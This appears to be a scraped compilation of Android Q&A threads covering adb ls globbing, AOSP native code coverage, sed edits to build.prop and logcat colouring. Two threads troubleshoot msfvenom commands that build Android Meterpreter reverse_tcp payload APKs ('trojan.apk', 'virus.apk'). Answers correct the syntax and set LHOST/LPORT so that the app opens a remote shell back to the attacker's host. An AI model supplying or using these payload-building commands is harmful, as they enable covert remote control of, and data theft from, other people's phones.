I create payload using msfvenom but below error generated - android

My command is:
./msfvenom -p android/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=443 -o > ~/storage/itechhacks.apk
But it wants below details:
[-] No platform was selected, choosing Msf::Module::Platform::Android from the payload
[-] No arch selected, selecting arch: dalvik from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 10075 bytes

You can specify an architecture with -a or --arch, a platform with --platform, encoder with -e and badchars with -b.
You get more help with --help or -h
To list available arch, encoders... etc use --list arch, --list encoders ...etc
And you may want to specify the format with -f to get a .apk file and don't use > with -o
Depending on the msfvenom version the commands may differ slightly, use -h or --help to get the right syntax.
Here is a good description of msfvenom: https://www.offensive-security.com/metasploit-unleashed/Msfvenom/

Related

Extra ":" at the end of output from sudo su -c ls, only when globbing is used

Using adb shell to run commands on an android device, I get different results when running ls with or without a wildcard (globbing, i.e. *).
When running ls without a wildcard, the last path is displayed properly. When running ls with a wildcard, the path is displayed with a : at the end of it for some reason. The actual file does not have a : in its path.
My issue is specifically with the last file: /data/data/com.kauf.wrapmyFaceFunphotoeditor/files/DV-com.com.kauf.wrapmyFaceFunphotoeditor-2020-05-17-17-44-30-DEBUG.txt:
it has a : at the end which isn't supposed to be there
Why does using a wildcard in ls add characters to the result path?
Edit, environment details: Windows 10 / Android 7, the code is running on sh. I've run adb shell to get to this command prompt, and doing it in one line (i.e. adb shell su -c ls ...) returns similar results, same for adb shell command ...; also clarified the question.
As described in Why you shouldn't parse the output of ls, ls's behavior is not always well-defined. It's generally safer to use NULs (if you don't have any control or knowledge of filenames) or newlines (if you have reason to be certain that filenames can't contain them) to directly delimit a list of values emitted by the shell. Consider, then:
# output is separated by NULs, which cannot possibly exist in filenames
printf '%s\0' /data/data/com.kauf.wrapmyfacefunphotoeditor/files/DV-*
...or...
# output is separated by newlines; beware of a file named DV-evil<newline>something-else
printf '%s\n' /data/data/com.kauf.wrapmyfacefunphotoeditor/files/DV-*
Note that if you're passing this through extra unescaping layers, it may be necessary to double up your backslashes -- if you see literal 0s or ns separating filenames in your output, that's evidence of same.
Note also that if no matching files exist, a glob will expand to itself, so you can get an output that contains only the literal string /data/data/com.kauf.wrapmyfacefunphotoeditor/files/DV-*; in bash this can be suppressed with shopt -s nullglob, but with /bin/sh (particularly the minimal busybox versions more likely to be available on Android) this may not be available. One way to work around this is with code similar to the following:
# set list of files into $1, $2, etc
set -- /data/data/com.kauf.wrapmyfacefunphotoeditor/files/DV-*
# exit immediately if $1 does not exist
if [ "$#" -le 1 ] && [ ! -e "$1" ]; then
  exit
fi
# otherwise, print the list in our desired format
# ("$@" expands to the file names; "$#" would only print their count)
printf '%s\0' "$@"
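The difference between NUL and newline delimiters, together with the no-match guard, as an added example that is not part of the original answer. The function names and the temporary files are constructed for illustration.

```sh
#!/bin/sh
# Added example: list glob matches NUL-delimited and count them safely.

# list_matches DIR PREFIX: print each match followed by a NUL byte.
# Prints nothing when the glob matches no file.
list_matches() {
    set -- "$1"/"$2"*
    # An unmatched glob stays literal, so $1 would not exist on disk.
    if [ "$#" -le 1 ] && [ ! -e "$1" ]; then
        return 0
    fi
    printf '%s\0' "$@"
}

# count_nul: number of NUL-terminated records on stdin.
count_nul() {
    tr -cd '\000' | wc -c | tr -d ' '
}

# count_lines: what a newline-based consumer of the same list would count.
count_lines() {
    tr '\000' '\n' | wc -l | tr -d ' '
}

demo() {
    d=$(mktemp -d) || return 1
    : > "$d/DV-a.txt"
    # constructed hostile file name containing a newline
    : > "$d/DV-evil
something-else"
    echo "NUL records: $(list_matches "$d" DV- | count_nul)"
    echo "lines:       $(list_matches "$d" DV- | count_lines)"
    echo "no match:    $(list_matches "$d" ZZ- | count_nul)"
    rm -rf "$d"
}
demo
```

Two files produce two NUL records but three lines, which is how a newline in a file name turns into an extra, attacker-chosen entry for any consumer that splits on newlines.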

Native Code coverage with android soong build system

I'm trying to generate a code coverage report for my native components with AOSP source code using the soong build system.
I have extended the AOSP vhal, but the unit test cases are the same as in the link below.
http://androidxref.com/8.1.0_r33/xref/hardware/interfaces/automotive/vehicle/2.0/default/tests/
Tried adding below to cc_test, cc_binary in Android.bp
native_coverage : true,
cflags: [
    "-g",
    "-O0",
    "-fprofile-arcs",
    "-ftest-coverage",
],
ldflags : [
    "-fprofile-arcs",
    "-ftest-coverage",
],
Native binary unit-tests-coverage is generated in out/target/product but I can't find gcno intermediates for this.
Running below command gives me *.gcda files for each test files.
adb shell \
GCOV_PREFIX=/data/local/tmp \
GCOV_PREFIX_STRIP=`echo $ANDROID_BUILD_TOP | grep -o / | wc -l` \
/data/local/tmp/unit-tests-coverage
I have tried below links but not sure how to proceed :(
http://logan.tw/posts/2015/04/28/check-code-coverage-with-clang-and-lcov/
https://android.googlesource.com/platform/bionic.git/+/master-soong
https://android.googlesource.com/platform/build/soong/+/581341d%5E%21/
https://android.googlesource.com/platform/external/e2fsprogs/+/fedfb27%5E%21/
https://android.googlesource.com/platform/development/+/master/scripts/acov#23
http://androidxref.com/9.0.0_r3/xref/bionic/README.md#293
I'm not sure if google's vts framework can be used here to generate native code coverage.
https://codelabs.developers.google.com/codelabs/android-vts-8/#6
"gcnodir" is generated but not sure how to make use of it.
/coverage/data/nativetest64/vehicle-unit-tests-coverage/unit-tests-coverage.gcnodir
Posting answer to my question for other users on SO.
Install coverage tool :
sudo apt-get install lcov (This should install lcov-1.12)
sudo apt-get install gcc-4.6 (Clang generates .gcno approximately equal to gcc 4.2 that aren't compatible with gcov-4.8. Installing gcc-4.6 to get gcov-4.6 and invoking lcov with '--gcov-tool /usr/bin/gcov-4.6')
Download LLVM 3.8 for llvm-cov to work : http://releases.llvm.org/download.html
All native unit test cases i.e instrumented binary needs to be executed on target. To build and emit clang's instrumentation based profiling. Example: http://androidxref.com/9.0.0_r3/xref/hardware/interfaces/automotive/vehicle/2.0/default/Android.bp#82 (Renamed to vehicle-manager-unit-test for shorter name)
export NATIVE_COVERAGE=true
Add native_coverage: true to test module in Android.bp
Go to: module-name/test
Use mm or make command to build native binary
Ex: For hardware/interfaces/automotive/vehicle/2.0/default/tests/ :
mma or make vehicle-manager-unit-test -j32
Copy coverage enabled instrumented binary to target
adb push out/target/product/product_name/data/nativetest64/vendor/vehicle-manager-unit-test /data/nativetest64/vehicle-manager-unit-test
adb shell chmod +x /data/nativetest64/vehicle-manager-unit-test
Run test cases and generate .gcda files
adb shell \
GCOV_PREFIX=/data/local/tmp \
GCOV_PREFIX_STRIP=`echo $ANDROID_BUILD_TOP | grep -o / | wc -l` \
/data/nativetest64/vehicle-manager-unit-test
adb shell "find -iname '*.gcda'"
adb pull /data/local/tmp/proc/self/cwd/out/soong/.intermediates/hardware/interfaces/automotive/vehicle/2.0/default/vehicle-manager-unit-test/android_x86_64_silvermont_vendor_cov/obj/hardware/interfaces/automotive/vehicle/2.0/default/tests/ .(Destination folder)
Extract GCNO files from GCNODIR (archive file generated at out/coverage/data/nativetest64/vendor/vehicle-manager-unit-test) to the same folder as the GCDA files
llvm-cov gcov -f -b *.gcda (https://llvm.org/docs/CommandGuide/llvm-cov.html )
lcov --directory . --base-directory . --gcov-tool /usr/bin/gcov-4.6 --capture -o cov.info (http://ltp.sourceforge.net/coverage/lcov.php)
genhtml cov.info -o output
Here's the script which wraps all these commands:
https://gist.github.com/pankajgangwar/f070b8b54e83543f8e3638dcd2cae1b8
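Where the .gcda files end up on the device depends on the two environment variables set in the run step. The sketch below is an added example, not code from the answer or from AOSP: it models the documented gcov rule (drop GCOV_PREFIX_STRIP leading directories from the path compiled into the binary, then prepend GCOV_PREFIX) so the directory to adb pull can be predicted. The function names and sample paths are constructed.

```sh
#!/bin/sh
# Added example: predict where an instrumented binary writes its .gcda files.
# Models the GCOV_PREFIX / GCOV_PREFIX_STRIP rule: drop STRIP leading
# directories from the path compiled into the binary, then prepend PREFIX.

# slash_count PATH: same number as `echo PATH | grep -o / | wc -l`
slash_count() {
    printf '%s' "$1" | tr -cd '/' | wc -c | tr -d ' '
}

# gcda_path PREFIX STRIP EMBEDDED_PATH: print the on-device output path.
gcda_path() {
    prefix=$1 strip=$2 path=$3
    while [ "$strip" -gt 0 ]; do
        case $path in
            /*/*) path=/${path#/*/} ;;   # remove one leading directory
            *) break ;;                  # only the file name is left
        esac
        strip=$((strip - 1))
    done
    printf '%s%s\n' "$prefix" "$path"
}

# Constructed sample values, shaped like the paths on this page.
BUILD_TOP=/home/user/aosp
OBJ=out/soong/.intermediates/module/obj/tests/Foo_test.gcda

demo() {
    n=$(slash_count "$BUILD_TOP")
    echo "strip count: $n"
    # path embedded as an absolute build-tree path, stripped by $n levels
    gcda_path /data/local/tmp "$n" "$BUILD_TOP/$OBJ"
    # path embedded relative to /proc/self/cwd, not stripped
    gcda_path /data/local/tmp 0 "/proc/self/cwd/$OBJ"
}
demo
```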
here it is explained how to generate coverage reports, which do require GTest:
these flags enable the generation of test coverage: -fprofile-arcs -ftest-coverage
then one has to use gcov: gcov main_test.cpp
whose output can then be passed on to lcov (for reference):
$ lcov --coverage --directory . --output-file main_coverage.info
from which one can generate an lcov coverage report in HTML format:
$ genhtml main_coverage.info --output-directory out
these .gcda files in .gcnodir are gcov data files. gcov also has an output option --json-format, which might come handy when wanting to consume the coverage data with a web-service.
one of the examples from the links you've provided can be used to generate it for a whole project:
Collect the code coverage results:
$ lcov --directory . \
--base-directory . \
--gcov-tool gcov.sh \
--capture -o cov.info
Generate HTML files:
$ genhtml cov.info -o output
where the only difference is, that the wrapper script would need to be adjusted to call gcov. probably one could even omit the wrapper passed with option --gcov-tool, since it should be directly called.
since one can only prepare the coverage report by adding the compiler flags, the gcov and lcov commands should be setup as post-build script, so that they would automatically generate the report.

when i try to make payload it is showing me

When I make a payload with this command in my termux app
. /msfvenom -p android/meterpreter/reverse_tcp lhost=IP ADDRESS lport=3333 -o /sdcard/FILE NAME/test.apk
Then it is showing me
No platform was selected, choosing Msf::Module::Platform::Android from the payload
No Arch selected, selecting Arch: dalvik from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 9435 bytes
Error: Permission denied # rb_sysopen - /sdcard/apk_payload/hack.apk
How to solve it please please 🙏 please help me
First of all, sorry for my bad english.
It looks like your problem is the path, the sdcard path is ~/storage
And inside, you just can access some folders, in my case are dcim, downloads, movies, music, pictures & shared
I've decided to put it in downloads, so the path should look like this:
~/storage/downloads/trojan.apk
The final code should be like this:
./msfvenom -p android/meterpreter/reverse_tcp LHOST=Your Ip LPORT=Your Port -o ~/storage/downloads/trojan.apk
First, if msfvenom is in your usr/local/bin folder, you should not need ./msfvenom; just start with msfvenom.
Second, the -o option is used when the -x option is used; otherwise you should not use it.
Your command should look like this
msfvenom -p android/meterpreter/reverse_tcp LHOST=your ip LPORT=your port R > /root/what-ever-path-you-want/app-name.apk
Example:
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.19 LPORT=4444 R > /root/Documents/virus.apk

Bash: find and replace text from a script

I need to modify a number in a file using a bash script.
I want to remove a line that contains dalvik.vm.heapsize=256 and replace it with a new line that contains dalvik.vm.heapsize=512. I do not know the line number, and 256 is a hypothetical value. How can I build a script that performs this action?
Use the sed command:
sed -i -e 's/^\(dalvik.vm.heapsize=\).*/\1512/' build.prop
The command searches for a line starting with dalvik.vm.heapsize=, then replaces the part after = with 512. The left part is captured using the regular expression group, and \1 in the replacement part (\1512) refers to this group. The -i option instructs to replace in-place. Refer to info sed for details.
Here is a more advanced example taking into account possible leading spaces/tabs and making the match stricter by means of the regular expression lists:
sed -i -e 's/^\([ \t]*dalvik.vm.heapsize=\)[0-9]\+/\1512/' build.prop
Perl is more flexible. I prefer to use it for more complicated tasks. There is no such simple way as sed's -i option for Perl, however; but you can simply use the shell redirection, e.g.:
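# write to a temporary file first: redirecting straight into build.prop
# would truncate it before perl has read it
perl -n -e 's/^([\t\s]*dalvik.vm.heapsize=)\d+/${1}512/; print' < build.prop > build.prop.tmp && \
mv build.prop.tmp build.prop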
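A more defensive form of the same edit, as an added example that is not part of the original answers. The set_prop function and the sample file are constructed for illustration; it escapes the dots in the key, rejects values that would need escaping inside the sed expression, appends the property when it is missing, and never redirects into the file it is reading.

```sh
#!/bin/sh
# Added example: set KEY=VALUE in a properties file via a temporary file.

# set_prop FILE KEY VALUE
# Rewrites the value on an existing KEY= line, or appends KEY=VALUE.
# Returns 2 if KEY or VALUE holds characters outside [A-Za-z0-9._-].
set_prop() {
    file=$1 key=$2 value=$3
    case $key$value in
        *[!A-Za-z0-9._-]*) return 2 ;;
    esac
    [ -n "$key" ] || return 2
    # Escape dots so "." in the key matches only a literal dot.
    key_re=$(printf '%s' "$key" | sed 's/\./\\./g')
    tmp=$(mktemp "$file.XXXXXX") || return 1
    if grep -q "^[[:space:]]*$key_re=" "$file"; then
        sed "s/^\([[:space:]]*$key_re=\).*/\1$value/" "$file" > "$tmp"
    else
        cat "$file" > "$tmp" && printf '%s=%s\n' "$key" "$value" >> "$tmp"
    fi || { rm -f "$tmp"; return 1; }
    # Swap the file in only once the new content is complete.
    # mktemp creates the file with mode 0600; chmod afterwards if needed.
    mv "$tmp" "$file"
}

demo() {
    f=$(mktemp) || return 1
    # constructed sample content
    printf 'ro.debuggable=0\n  dalvik.vm.heapsize=256\n' > "$f"
    set_prop "$f" dalvik.vm.heapsize 512
    set_prop "$f" dalvik.vm.heapgrowthlimit 192
    cat "$f"
    rm -f "$f"
}
demo
```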

color the lines of logcat on Linux [android]

The Logcat in Eclipse has colors for errors, warning, debug, ...
What can I do to get the same result on Linux (Ubuntu) when I run the command 'adb -e logcat' in a terminal, so that the output is colored?
adb logcat -v color
from developer.android.com
Link with script
I think it will be useful for you and you can change script by yourself;)
This is my view of "colorizing" the logcat:
https://bitbucket.org/brunobraga/logcat-colorize
My favourite is pidcat, maintained by Jake Wharton based off of Jeff Sharkey's script (mentioned by Yaroslav Boichuk).
I have also used logcat-color, maintained by Marshall Culpepper, (also based off of Jeff's script) which allows you to create profiles you can activate (log per task, or per application, etc).
I have preferred pidcat because at the time logcat-color wouldn't filter by package name, and I never went back to try again once it was added. Seems to be reasonably popular still as well.
And yet another script:
#!/bin/sh
# Colorize logcat by priority; restart adb logcat whenever it exits.
while :; do
  # "$@" passes the script's arguments (e.g. -d, -e, -s SERIAL) on to adb
  adb "$@" logcat | sed \
    -e 's:^V/:\x00\x1b[0;35m:g' \
    -e 's:^D/:\x00\x1b[0;36m:g' \
    -e 's:^I/:\x00\x1b[0;32m:g' \
    -e 's:^W/:\x00\x1b[0;33m:g' \
    -e 's:^E/:\x00\x1b[0;31m:g' \
    -e 's:^F/:\x00\x1b[0;31m:g' \
    -e '/Unexpected value from nativeGetEnabledTags/d' \
    -e '/The application may be/d'
  sleep 1
done
If you use Python, PyLogAnalyser can filter, colorize and analyse all type of logs in Linux, Windows and Mac (and Cygwin).
You can install it directly from PyPI:
python -m pip install pyloganalyser
And call it in order to print the log for the standard output (also, for text or HTML output):
adb logcat -v threadtime | python -m loganalyser --stdin --stdout -c Android_logcat_threadtime.conf
The file 'Android_logcat_threadtime.conf' is included in the module directory. So the actual invocation could be:
CONFPATH="$(python -c 'import os, loganalyser; print(os.path.dirname(loganalyser.__file__))')"
adb logcat -v threadtime | python -m loganalyser --stdin --stdout -c "$CONFPATH"/android/Android_logcat_threadtime.conf
Website: http://pyloganalyser.sourceforge.net
Have a try with lnav, and add the logcat config from here
